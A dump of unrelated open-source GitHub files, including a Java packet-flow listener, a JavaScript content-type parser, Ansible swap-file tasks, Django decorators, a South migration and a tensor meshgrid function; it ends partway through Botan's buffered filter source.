permanent = new PcapPacket(Type.POINTER); packet.transferStateAndDataTo(permanent); flowGen.addPacket(PacketReader.getBasicPacketInfo(permanent, true, false)); if(isCancelled()) { pcap.breakloop(); logger.debug("break 
Packet loop"); } }; //FlowMgr.getInstance().setListenFlag(true); logger.info("Pcap is listening..."); firePropertyChange("progress","open successfully","listening: "+device); int ret = pcap.loop(Pcap.DISPATCH_BUFFER_FULL, jpacketHandler, device); String str; switch (ret) { case 0: str = "listening: " + device + " finished"; break; case -1: str = "listening: " + device + " error"; break; case -2: str = "stop listening: " + device; break; default: str = String.valueOf(ret); } return str; } @Override protected void process(List<String> chunks) { super.process(chunks); } @Override protected void done() { super.done(); } @Override public void onFlowGenerated(BasicFlow flow) { firePropertyChange(PROPERTY_FLOW,null,flow); } }
{ "pile_set_name": "Github" }
/*!
 * content-type
 * Copyright(c) 2015 Douglas Christopher Wilson
 * MIT Licensed
 */

'use strict'

/**
 * RegExp to match *( ";" parameter ) in RFC 7231 sec 3.1.1.1
 *
 * parameter     = token "=" ( token / quoted-string )
 * token         = 1*tchar
 * tchar         = "!" / "#" / "$" / "%" / "&" / "'" / "*"
 *               / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~"
 *               / DIGIT / ALPHA
 *               ; any VCHAR, except delimiters
 * quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE
 * qdtext        = HTAB / SP / %x21 / %x23-5B / %x5D-7E / obs-text
 * obs-text      = %x80-FF
 * quoted-pair   = "\" ( HTAB / SP / VCHAR / obs-text )
 */
var paramRegExp = /; *([!#$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+) *= *("(?:[\u000b\u0020\u0021\u0023-\u005b\u005d-\u007e\u0080-\u00ff]|\\[\u000b\u0020-\u00ff])*"|[!#$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+) */g

// Characters permitted inside a parameter value (quoted or not).
var textRegExp = /^[\u000b\u0020-\u007e\u0080-\u00ff]+$/

// A complete RFC 7230 token (a value that may appear unquoted).
var tokenRegExp = /^[!#$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+$/

/**
 * RegExp to match quoted-pair in RFC 7230 sec 3.2.6
 *
 * quoted-pair = "\" ( HTAB / SP / VCHAR / obs-text )
 * obs-text    = %x80-FF
 */
var qescRegExp = /\\([\u000b\u0020-\u00ff])/g

/**
 * RegExp to match chars that must be quoted-pair in RFC 7230 sec 3.2.6
 */
var quoteRegExp = /([\\"])/g

/**
 * RegExp to match type in RFC 6838
 *
 * media-type = type "/" subtype
 * type       = token
 * subtype    = token
 */
var typeRegExp = /^[!#$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+\/[!#$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+$/

/**
 * Module exports.
 * @public
 */

exports.format = format
exports.parse = parse

/**
 * Format object to media type.
 * @param {object} obj  object with `type` and optional `parameters`
 * @return {string}  formatted media type, e.g. "text/html; charset=utf-8"
 * @public
 */

function format(obj) {
  if (!obj || typeof obj !== 'object') {
    throw new TypeError('argument obj is required')
  }

  var parameters = obj.parameters
  var type = obj.type

  if (!type || !typeRegExp.test(type)) {
    throw new TypeError('invalid type')
  }

  var string = type

  // append parameters
  if (parameters && typeof parameters === 'object') {
    var param
    // Sort keys so the output is deterministic.
    var params = Object.keys(parameters).sort()

    for (var i = 0; i < params.length; i++) {
      param = params[i]

      if (!tokenRegExp.test(param)) {
        throw new TypeError('invalid parameter name')
      }

      // qstring quotes/escapes the value only when necessary.
      string += '; ' + param + '=' + qstring(parameters[param])
    }
  }

  return string
}

/**
 * Parse media type to object.
 *
 * @param {string|object} string  a header value, or a req/res-like object
 *   carrying a content-type header
 * @return {Object}  ContentType with lower-cased `type` and `parameters` map
 * @public
 */

function parse(string) {
  if (!string) {
    throw new TypeError('argument string is required')
  }

  if (typeof string === 'object') {
    // support req/res-like objects as argument
    string = getcontenttype(string)

    if (typeof string !== 'string') {
      throw new TypeError('content-type header is missing from object');
    }
  }

  if (typeof string !== 'string') {
    throw new TypeError('argument string is required to be a string')
  }

  // Everything before the first ';' is the media type itself.
  var index = string.indexOf(';')
  var type = index !== -1
    ? string.substr(0, index).trim()
    : string.trim()

  if (!typeRegExp.test(type)) {
    throw new TypeError('invalid media type')
  }

  var key
  var match
  var obj = new ContentType(type.toLowerCase())
  var value

  // Position the sticky/global regex right at the first ';' (or 0 when
  // index is -1, since negative lastIndex is clamped by exec).
  paramRegExp.lastIndex = index

  while (match = paramRegExp.exec(string)) {
    // Parameters must be contiguous: each match must start exactly where
    // the previous one ended, otherwise there is junk between them.
    if (match.index !== index) {
      throw new TypeError('invalid parameter format')
    }

    index += match[0].length
    key = match[1].toLowerCase()
    value = match[2]

    if (value[0] === '"') {
      // remove quotes and escapes
      value = value
        .substr(1, value.length - 2)
        .replace(qescRegExp, '$1')
    }

    obj.parameters[key] = value
  }

  // Trailing junk after the last parameter is also an error.
  if (index !== -1 && index !== string.length) {
    throw new TypeError('invalid parameter format')
  }

  return obj
}

/**
 * Get content-type from req/res objects.
* * @param {object} * @return {Object} * @private */ function getcontenttype(obj) { if (typeof obj.getHeader === 'function') { // res-like return obj.getHeader('content-type') } if (typeof obj.headers === 'object') { // req-like return obj.headers && obj.headers['content-type'] } } /** * Quote a string if necessary. * * @param {string} val * @return {string} * @private */ function qstring(val) { var str = String(val) // no need to quote tokens if (tokenRegExp.test(str)) { return str } if (str.length > 0 && !textRegExp.test(str)) { throw new TypeError('invalid parameter value') } return '"' + str.replace(quoteRegExp, '\\$1') + '"' } /** * Class to represent a content type. * @private */ function ContentType(type) { this.parameters = Object.create(null) this.type = type }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <style xmlns="http://purl.org/net/xbiblio/csl" version="1.0" default-locale="en-US"> <!-- Generated with https://github.com/citation-style-language/utilities/tree/master/generate_dependent_styles/data/iop --> <info> <title>European Journal of Physics</title> <id>http://www.zotero.org/styles/european-journal-of-physics</id> <link href="http://www.zotero.org/styles/european-journal-of-physics" rel="self"/> <link href="http://www.zotero.org/styles/institute-of-physics-numeric" rel="independent-parent"/> <link href="http://iopscience.iop.org/0143-0807" rel="documentation"/> <category citation-format="numeric"/> <category field="physics"/> <issn>0143-0807</issn> <eissn>1361-6404</eissn> <updated>2014-05-15T12:00:00+00:00</updated> <rights license="http://creativecommons.org/licenses/by-sa/3.0/">This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License</rights> </info> </style>
{ "pile_set_name": "Github" }
--- sbt_tarball: "sbt-{{sbt_version}}.tgz" sbt_download_location: "https://dl.bintray.com/sbt/native-packages/sbt/{{sbt_version}}/{{sbt_tarball}}"
{ "pile_set_name": "Github" }
#ifndef PQCLEAN_DILITHIUM3_AVX2_PACKING_H #define PQCLEAN_DILITHIUM3_AVX2_PACKING_H #include "api.h" #include "params.h" #include "polyvec.h" void PQCLEAN_DILITHIUM3_AVX2_pack_pk( uint8_t pk[PQCLEAN_DILITHIUM3_AVX2_CRYPTO_PUBLICKEYBYTES], const uint8_t rho[SEEDBYTES], const polyveck *t1); void PQCLEAN_DILITHIUM3_AVX2_pack_sk( uint8_t sk[PQCLEAN_DILITHIUM3_AVX2_CRYPTO_SECRETKEYBYTES], const uint8_t rho[SEEDBYTES], const uint8_t key[SEEDBYTES], const uint8_t tr[SEEDBYTES], const polyvecl *s1, const polyveck *s2, const polyveck *t0); void PQCLEAN_DILITHIUM3_AVX2_pack_sig( uint8_t sig[PQCLEAN_DILITHIUM3_AVX2_CRYPTO_SECRETKEYBYTES], const polyvecl *z, const polyveck *h, const poly *c); void PQCLEAN_DILITHIUM3_AVX2_unpack_pk( uint8_t rho[SEEDBYTES], polyveck *t1, const uint8_t pk[PQCLEAN_DILITHIUM3_AVX2_CRYPTO_PUBLICKEYBYTES]); void PQCLEAN_DILITHIUM3_AVX2_unpack_sk( uint8_t rho[SEEDBYTES], uint8_t key[SEEDBYTES], uint8_t tr[CRHBYTES], polyvecl *s1, polyveck *s2, polyveck *t0, const uint8_t *sk); int PQCLEAN_DILITHIUM3_AVX2_unpack_sig( polyvecl *z, polyveck *h, poly *c, const uint8_t sig[PQCLEAN_DILITHIUM3_AVX2_CRYPTO_BYTES]); #endif
{ "pile_set_name": "Github" }
/* * Tigase XMPP Server - The instant messaging server * Copyright (C) 2004 Tigase, Inc. ([email protected]) * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU Affero General Public License as published by * the Free Software Foundation, version 3 of the License. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Affero General Public License for more details. * * You should have received a copy of the GNU Affero General Public License * along with this program. Look for COPYING file in the top folder. * If not, see http://www.gnu.org/licenses/. */ package tigase.component; import tigase.conf.Configurable; import tigase.db.AuthRepository; import tigase.db.UserRepository; import tigase.kernel.core.Kernel; import java.util.Collection; import java.util.HashMap; import java.util.Iterator; import java.util.Map; /** * Created by andrzej on 12.08.2016. 
*/ public class BackwardCompatibilityHelper { public static Object convertToArray(Collection collection) { Iterator iter = collection.iterator(); if (!iter.hasNext()) { return null; } Class objCls = iter.next().getClass(); if (objCls == Integer.class) { return convertToIntArray(collection); } else if (objCls == Long.class) { return convertToLongArray(collection); } else if (objCls == Double.class) { return convertToDoubleArray(collection); } else if (objCls == Float.class) { return convertToFloatArray(collection); } else if (objCls == Boolean.class) { return convertToBoolArray(collection); } else if (objCls == String.class) { return convertToStringArray(collection); } return null; } public static Object convertToBoolArray(Collection col) { boolean[] arr = new boolean[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { Boolean v = (Boolean) iter.next(); arr[pos++] = v.booleanValue(); } return arr; } public static Object convertToDoubleArray(Collection col) { double[] arr = new double[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { Number v = (Number) iter.next(); arr[pos++] = v.doubleValue(); } return arr; } public static Object convertToFloatArray(Collection col) { float[] arr = new float[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { Number v = (Number) iter.next(); arr[pos++] = v.floatValue(); } return arr; } public static Object convertToIntArray(Collection col) { int[] arr = new int[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { Number v = (Number) iter.next(); arr[pos++] = v.intValue(); } return arr; } public static Object convertToLongArray(Collection col) { long[] arr = new long[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { Number v = (Number) iter.next(); arr[pos++] = v.longValue(); } return arr; } public static Object convertToStringArray(Collection col) { String[] arr = new 
String[col.size()]; int pos = 0; Iterator iter = col.iterator(); while (iter.hasNext()) { String v = (String) iter.next(); arr[pos++] = v; } return arr; } public static Map<String, Object> fillProps(Map<String, Object> beanProperties) { Map<String, Object> result = new HashMap<>(); for (Map.Entry<String, Object> e : beanProperties.entrySet()) { String key = e.getKey(); Object value = e.getValue(); if (value instanceof Collection) { value = convertToArray((Collection) value); if (value != null) { result.put(key, value); } } if (value instanceof Map) { String prefix = key; for (Map.Entry<String, Object> e1 : ((Map<String, Object>) value).entrySet()) { result.put(key + "/" + e1.getKey(), e1.getValue()); } } else { result.put(key, value); } } return result; } public static Map<String, Object> getDefConfigParams(Kernel kernel, String configType, String dbUri, Map<String, Object> params) { Map<String, Object> initProperties = new HashMap<>(); initProperties.put("config-type", configType); for (Map.Entry<String, Object> e : params.entrySet()) { if (e.getKey().startsWith("-")) { initProperties.put(e.getKey(), e.getValue()); } } // Injecting default DB URI for backward compatibility initProperties.put(Configurable.USER_REPO_URL_PROP_KEY, dbUri); initProperties.put(Configurable.GEN_USER_DB_URI, dbUri); UserRepository userRepo = kernel.getInstance(UserRepository.class); initProperties.put(Configurable.SHARED_USER_REPO_PROP_KEY, userRepo); AuthRepository authRepo = kernel.getInstance(AuthRepository.class); initProperties.put(Configurable.SHARED_AUTH_REPO_PROP_KEY, authRepo); return initProperties; } }
{ "pile_set_name": "Github" }
# Create a swap file of {{ swap_size_in_mb }} MB, register it in fstab,
# enable it, and tune the kernel's swappiness.
- name: Swap | Create swap space
  command: dd if=/dev/zero of=/extraswap bs=1M count={{ swap_size_in_mb }}

# Format the file as swap space.
- name: Swap | Make swap
  command: mkswap /extraswap

# Persist the swap file across reboots.
- name: Swap | Add to fstab
  action: lineinfile dest=/etc/fstab regexp="extraswap" line="/extraswap none swap sw 0 0" state=present

# Activate everything listed in fstab, including the new entry.
- name: Swap | Turn swap on
  command: swapon -a

# Swappiness 0 tells the kernel to avoid swapping except under memory pressure.
# NOTE(review): "swapiness" in the task name is a typo (display-only); the
# kernel knob written below is spelled /proc/sys/vm/swappiness.
- name: Swap | Set swapiness
  shell: echo 0 | sudo tee /proc/sys/vm/swappiness
{ "pile_set_name": "Github" }
# $NetBSD: Makefile,v 1.9 2012/10/06 11:54:38 asau Exp $
#
# pkgsrc package for the Calvin & Hobbes fortune file. The distfile is a
# single plain-text fortunes file; we index it with strfile(8) and install
# both the text and its .dat index.

DISTNAME=	fortunes-calvin-0.2
CATEGORIES=	games
MASTER_SITES=	http://www.netmeister.org/apps/
EXTRACT_SUFX=	.gz

MAINTAINER=	[email protected]
HOMEPAGE=	http://www.netmeister.org/misc.html
COMMENT=	Fortunes from the famous Calvin & Hobbes comic strips

# strfile(8) is needed at build time to generate the random-access index.
BUILD_DEPENDS+=	fortune-strfile-[0-9]*:../../games/fortune-strfile

DIST_SUBDIR=	${PKGNAME_NOREV}nb1
STRFILE=	${LOCALBASE}/bin/strfile
WRKSRC=		${WRKDIR}

# Build the .dat index next to the fortunes file.
do-build:
	${STRFILE} ${WRKDIR}/${DISTNAME}

# Install the fortunes file and its index as "calvin" / "calvin.dat".
do-install:
	${INSTALL_DATA_DIR} ${DESTDIR}${PREFIX}/share/games/fortune/
	${INSTALL_DATA} ${WRKDIR}/${DISTNAME} \
		${DESTDIR}${PREFIX}/share/games/fortune/calvin
	${INSTALL_DATA} ${WRKDIR}/${DISTNAME}.dat \
		${DESTDIR}${PREFIX}/share/games/fortune/calvin.dat

.include "../../mk/bsd.pkg.mk"
{ "pile_set_name": "Github" }
# SOME DESCRIPTIVE TITLE. # Copyright (C) YEAR THE PACKAGE'S COPYRIGHT HOLDER # This file is distributed under the same license as the PACKAGE package. # FIRST AUTHOR <EMAIL@ADDRESS>, YEAR. # msgid "" msgstr "" "Project-Id-Version: django-registration trunk\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2008-04-05 13:51+0200\n" "PO-Revision-Date: 2008-04-05 14:00+0100\n" "Last-Translator: Nebojsa Djordjevic <[email protected]>\n" "Language-Team: \n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "Plural-Forms: nplurals=3; plural=n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2;\n" "X-Poedit-Language: Serbian\n" "X-Poedit-Country: YUGOSLAVIA\n" #: forms.py:38 msgid "username" msgstr "korisničko ime" #: forms.py:41 msgid "email address" msgstr "email adresa" #: forms.py:43 msgid "password" msgstr "šifra" #: forms.py:45 msgid "password (again)" msgstr "šifra (ponovo)" #: forms.py:54 msgid "Usernames can only contain letters, numbers and underscores" msgstr "Korisničko ime može da se sastoji samo od slova, brojeva i donje crte (\"_\")" #: forms.py:59 msgid "This username is already taken. Please choose another." msgstr "Korisničko ime je već zauzeto. Izaberite drugo." #: forms.py:71 msgid "You must type the same password each time" msgstr "Unete šifre se ne slažu" #: forms.py:100 msgid "I have read and agree to the Terms of Service" msgstr "Pročitao sam i slažem se sa uslovima korišćenja" #: forms.py:109 msgid "You must agree to the terms to register" msgstr "Morate se složiti sa uslovima korišćenja da bi ste se registrovali" #: forms.py:128 msgid "This email address is already in use. Please supply a different email address." msgstr "Ova e-mail adresa je već u upotrebi. Morate koristiti drugu e-mail adresu." #: forms.py:153 msgid "Registration using free email addresses is prohibited. Please supply a different email address." 
msgstr "Registracija korišćenjem besplatnig e-mail adresa je zabranjena. Morate uneti drugu e-mail adresu." #: models.py:188 msgid "user" msgstr "korisnik" #: models.py:189 msgid "activation key" msgstr "aktivacioni ključ" #: models.py:194 msgid "registration profile" msgstr "registracioni profil" #: models.py:195 msgid "registration profiles" msgstr "registracioni profili"
{ "pile_set_name": "Github" }
/* Работа с GUI. */ #pragma once namespace Gui { /* Инициализация. */ void init(void); /* Деинициализация. */ void uninit(void); /* Кээлбэк для _enumWindows(). IN window - окно. IN param - параметр. Return - true - продолжить поиск, false - прервать поиск. */ typedef bool (ENUMWINDOWSPROC)(HWND window, void *param); /* Перечисление дочерных окон. IN owner - родитель, может быть NULL. IN topToDown - true - перечислять с верху вниз, false - снизу вверх. IN proc - кэлбэк. IN param - параметр для кэлбэка. */ void _enumWindows(HWND owner, bool topToDown, ENUMWINDOWSPROC proc, void *param); /* Данная функция является обреткой для WindowFromPoint(), которая пропускает HTTRANSPARENT. Способ реализации доволно наивен, но мне не удалсоь найти более нормального способа. IN point - координаты для поиска окна. IN timeout - таймаут для WM_NCHITTEST. OUT hitTest - HitTest окна. Может быть NULL. Return - хэндл окна, или NULL. */ HWND _windowFromPoint(POINT point, DWORD timeout, DWORD *hitTest); /* Проверяет имеет ли стиль окна бордюры с изменением размера. IN style - стиль окна. Return - true - стиль имеед бордюры, false - не имеет. */ bool _styleHaveSizeBorders(DWORD style); /* Загрузка иконки как shared (не трубует удаления). IN module - моудль. IN id - ID. */ HICON _loadSharedIcon(HMODULE module, const LPWSTR id); /* Получение текста окна с выделением памяти. IN window - окно. OUT size - размер строки без нулевого соимвола. Может быть NULL. Return - текст окна (нужно освободить через NULL), или NULL в случаи ошибки. */ LPWSTR _getWindowText(HWND window, LPDWORD size); /* Загрузка курсора как shared (не трубует удаления). IN module - моудль. IN id - ID. */ HCURSOR _loadSharedCursor(HMODULE module, const LPWSTR id); /* Создание шрифта FONT_DIALOG. IN pointSize - размер шрифта в поинтах, рекомендуется значение 8. Return - хэндл шрифта, или NULL в случаи ошибки. */ HFONT _createDialogFont(BYTE pointSize); /* Запуск диалога выбора файла. 
IN owner - хэндл родителя IN initialDir - директория отностиельно который открывается диалог. Может быть NULL. IN OUT fileBuffer - на входе - инициализационный путь/файл, на выходе - выбранный файл. Return - true - в случаи успеха, false - в случаи провала. */ bool _browseForFile(HWND owner, LPWSTR initialDir, LPWSTR fileBuffer); /* Запуск диалога сохранения файла. IN owner - хэндл родителя IN initialDir - директория отностиельно который открывается диалог. Может быть NULL. IN OUT fileBuffer - на входе - инициализационный путь/файл, на выходе - выбранный файл. IN defaultExtension - расширение по умолчанию (без точки). Может быть NULL. IN filter - фильтр. См. OPENFILENAME.lpstrFilter. IN filterIndex - выделеный индекс элемента в filter. Return - true - в случаи успеха, false - в случаи провала. */ bool _browseForSaveFile(HWND owner, LPWSTR initialDir, LPWSTR fileBuffer, LPWSTR defaultExtension, LPWSTR filter, DWORD filterIndex); /* Инициализация общих контролев (надстройка для InitCommonControlsEx()). IN classes - ICC_*. Return - true - в случаи успеха, false - в случаи ошибки. */ bool _loadCommonControl(DWORD classes); };
{ "pile_set_name": "Github" }
from functools import wraps

from django.utils.cache import patch_vary_headers
from django.utils.decorators import available_attrs


def vary_on_headers(*headers):
    """
    Decorate a view so that the given header names are appended to the
    ``Vary`` header of every response it returns.

    Usage::

        @vary_on_headers('Cookie', 'Accept-language')
        def index(request):
            ...

    Header names are treated case-insensitively.
    """
    def decorator(func):
        @wraps(func, assigned=available_attrs(func))
        def wrapper(*args, **kwargs):
            # Run the view first, then patch its response in place.
            response = func(*args, **kwargs)
            patch_vary_headers(response, headers)
            return response
        return wrapper
    return decorator


def vary_on_cookie(func):
    """
    Decorate a view so that "Cookie" is added to the ``Vary`` header of its
    responses, indicating that the page's contents depend on cookies.

    Usage::

        @vary_on_cookie
        def index(request):
            ...
    """
    @wraps(func, assigned=available_attrs(func))
    def wrapper(*args, **kwargs):
        response = func(*args, **kwargs)
        patch_vary_headers(response, ('Cookie',))
        return response
    return wrapper
{ "pile_set_name": "Github" }
-- Ask Spotify for the track currently playing and keep the formatted
-- "Artist - Title" string in a variable.
set currentlyPlayingTrack to getCurrentlyPlayingTrack()

-- Method to get the currently playing track.
-- Returns "Artist - Title" built from Spotify's current track.
on getCurrentlyPlayingTrack()
	tell application "Spotify"
		-- Coerce both properties to plain strings before concatenating.
		set currentArtist to artist of current track as string
		set currentTrack to name of current track as string
		return currentArtist & " - " & currentTrack
	end tell
end getCurrentlyPlayingTrack
{ "pile_set_name": "Github" }
// Copyright (c) 2017-present PyO3 Project and Contributors //! Python object protocols #[macro_use] mod macros; pub mod basic; #[cfg(not(Py_LIMITED_API))] pub mod buffer; pub mod context; pub mod descr; pub mod gc; pub mod iter; pub mod mapping; pub mod methods; pub mod number; pub mod proto_methods; pub mod pyasync; pub mod sequence; pub use self::basic::PyObjectProtocol; #[cfg(not(Py_LIMITED_API))] pub use self::buffer::PyBufferProtocol; pub use self::context::PyContextProtocol; pub use self::descr::PyDescrProtocol; pub use self::gc::{PyGCProtocol, PyTraverseError, PyVisit}; pub use self::iter::PyIterProtocol; pub use self::mapping::PyMappingProtocol; pub use self::methods::{ PyClassAttributeDef, PyGetterDef, PyMethodDef, PyMethodDefType, PyMethodType, PySetterDef, }; pub use self::number::PyNumberProtocol; pub use self::pyasync::PyAsyncProtocol; pub use self::sequence::PySequenceProtocol;
{ "pile_set_name": "Github" }
# Base IRI against which relative IRIs in this query are resolved.
BASE <http://example.org/>
# Empty prefix resolves to a fragment of the base document.
PREFIX : <#>
# Matches subject :x, predicate :p, with the literal "x'" (escaped quote).
SELECT * WHERE { :x :p 'x\'' }
{ "pile_set_name": "Github" }
# -*- encoding: utf-8 -*- $_ = "あれ" print Kernel.chop
{ "pile_set_name": "Github" }
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from .array import tensor


def meshgrid(*xi, **kwargs):
    """
    Return coordinate matrices from coordinate vectors.

    Make N-D coordinate tensors for vectorized evaluations of N-D
    scalar/vector fields over N-D grids, given one-dimensional coordinate
    tensors x1, x2, ..., xn.

    Parameters
    ----------
    x1, x2,..., xn : array_like
        1-D arrays representing the coordinates of a grid.
    indexing : {'xy', 'ij'}, optional
        Cartesian ('xy', default) or matrix ('ij') indexing of output.
        For inputs of length M and N, 'xy' yields outputs of shape (N, M)
        and 'ij' yields (M, N).
    sparse : bool, optional
        If True, return a sparse grid (each output keeps size 1 along every
        dimension but its own) to conserve memory. Default is False.

    Returns
    -------
    X1, X2,..., XN : Tensor
        One output per input vector, each spanning the full N-D grid (or a
        broadcastable sparse version of it when ``sparse=True``).
    """
    from ..base import broadcast_to

    indexing = kwargs.pop('indexing', 'xy')
    sparse = kwargs.pop('sparse', False)
    if kwargs:
        raise TypeError(
            f"meshgrid() got an unexpected keyword argument '{list(kwargs)[0]}'")
    if indexing not in ('xy', 'ij'):
        raise ValueError("Valid values for `indexing` are 'xy' and 'ij'.")

    # Flatten every input to 1-D; each one contributes one output dimension.
    axes = [tensor(v) for v in xi]
    axes = [a.ravel() for a in axes]
    out_shape = [a.size for a in axes]

    # Cartesian ('xy') indexing is matrix ('ij') indexing with the first two
    # dimensions exchanged: swap them up front and swap back at the end.
    swap_xy = indexing == 'xy' and len(axes) > 1
    if swap_xy:
        axes[0], axes[1] = axes[1], axes[0]
        out_shape[0], out_shape[1] = out_shape[1], out_shape[0]

    outputs = []
    for dim, axis_tensor in enumerate(axes):
        # Insert a length-1 axis everywhere except this tensor's own dimension.
        index = [None] * len(out_shape)
        index[dim] = slice(None)
        expanded = axis_tensor[tuple(index)]
        if not sparse:
            expanded = broadcast_to(expanded, out_shape)
        outputs.append(expanded)

    if swap_xy:
        outputs[0], outputs[1] = outputs[1], outputs[0]

    return outputs
{ "pile_set_name": "Github" }
# encoding: utf-8 import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'AllocationChange' db.create_table('allocation_change', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('application', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['management_database.Application'])), ('component', self.gf('django.db.models.fields.CharField')(max_length=255)), ('quantity', self.gf('django.db.models.fields.IntegerField')()), ('billed', self.gf('django.db.models.fields.BooleanField')(default=False)), ('timestamp', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)), )) db.send_create_signal('management_database', ['AllocationChange']) def backwards(self, orm): # Deleting model 'AllocationChange' db.delete_table('allocation_change') models = { 'management_database.allocationchange': { 'Meta': {'object_name': 'AllocationChange', 'db_table': "'allocation_change'"}, 'application': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['management_database.Application']"}), 'billed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'component': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'quantity': ('django.db.models.fields.IntegerField', [], {}), 'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}) }, 'management_database.application': { 'Meta': {'object_name': 'Application', 'db_table': "'application'"}, 'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['management_database.User']"}), 'app_gid': ('django.db.models.fields.IntegerField', [], {'default': '-1'}), 'bundle_version': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}), 'cron_uid': 
('django.db.models.fields.IntegerField', [], {'default': '-1'}), 'db_host': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'db_max_size_mb': ('django.db.models.fields.IntegerField', [], {'default': '5'}), 'db_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'db_password': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'db_port': ('django.db.models.fields.IntegerField', [], {'default': '3306'}), 'db_username': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'debug': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'deleted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'proc_mem_mb': ('django.db.models.fields.IntegerField', [], {'default': '64'}), 'proc_num_threads': ('django.db.models.fields.IntegerField', [], {'default': '5'}), 'proc_stack_mb': ('django.db.models.fields.IntegerField', [], {'default': '2'}), 'setup_uid': ('django.db.models.fields.IntegerField', [], {'default': '-1'}), 'web_uid': ('django.db.models.fields.IntegerField', [], {'default': '-1'}) }, 'management_database.process': { 'Meta': {'unique_together': "(('application', 'host'),)", 'object_name': 'Process', 'db_table': "'process'"}, 'application': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['management_database.Application']"}), 'host': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'num_procs': ('django.db.models.fields.IntegerField', [], {'default': '1'}) }, 'management_database.user': { 'Meta': {'object_name': 'User', 'db_table': "'user'"}, 'admin': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'customer_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'email': 
('django.db.models.fields.CharField', [], {'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'passwd': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'subscription_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}) }, 'management_database.whitelist': { 'Meta': {'object_name': 'WhiteList', 'db_table': "'whitelist'"}, 'email': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'invite_code': ('django.db.models.fields.CharField', [], {'max_length': '255'}) } } complete_apps = ['management_database']
{ "pile_set_name": "Github" }
<component name="libraryTable"> <library name="Maven: org.springframework:spring-core:3.2.9.RELEASE"> <CLASSES> <root url="jar://$PROJECT_DIR$/../../maven/repository/org/springframework/spring-core/3.2.9.RELEASE/spring-core-3.2.9.RELEASE.jar!/" /> </CLASSES> <JAVADOC> <root url="jar://$PROJECT_DIR$/../../maven/repository/org/springframework/spring-core/3.2.9.RELEASE/spring-core-3.2.9.RELEASE-javadoc.jar!/" /> </JAVADOC> <SOURCES> <root url="jar://$PROJECT_DIR$/../../maven/repository/org/springframework/spring-core/3.2.9.RELEASE/spring-core-3.2.9.RELEASE-sources.jar!/" /> </SOURCES> </library> </component>
{ "pile_set_name": "Github" }
/*
* Buffered Filter
* (C) 1999-2007 Jack Lloyd
*
* Botan is released under the Simplified BSD License (see license.txt)
*/

#include <botan/buf_filt.h>
#include <botan/mem_ops.h>
#include <botan/internal/rounding.h>
#include <botan/exceptn.h>

namespace Botan {

/*
* Buffered_Filter Constructor
*
* b - block granularity: buffered_block() is always fed multiples of this.
* f - final minimum: at least this many bytes are held back for
*     buffered_final(); must not exceed the block granularity.
* The internal buffer holds two full blocks.
*/
Buffered_Filter::Buffered_Filter(size_t b, size_t f) :
   m_main_block_mod(b), m_final_minimum(f)
   {
   if(m_main_block_mod == 0)
      throw Invalid_Argument("m_main_block_mod == 0");

   if(m_final_minimum > m_main_block_mod)
